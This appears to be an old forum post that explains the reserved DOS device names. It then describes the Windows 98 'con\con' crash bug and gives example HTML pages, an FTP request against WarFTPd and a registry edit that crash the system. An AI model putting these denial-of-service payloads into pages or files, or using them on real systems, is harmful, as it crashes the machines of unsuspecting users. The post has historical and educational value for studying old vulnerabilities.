posted 19 years ago
NUL, AUX, CON, COM1-4, LPT1-3, and PRN
are reserved words used for DOS Devices
These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:
CLOCK$ - System clock
CON - Console; combination of keyboard and screen to handle input and output
AUX or COM1 - First serial communicationport
COMn - Second, Third, ... communicationport
LPT1 or PRN - First parallel port
NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null.
CONFIG$ - Unknown
Besides,
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example:
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>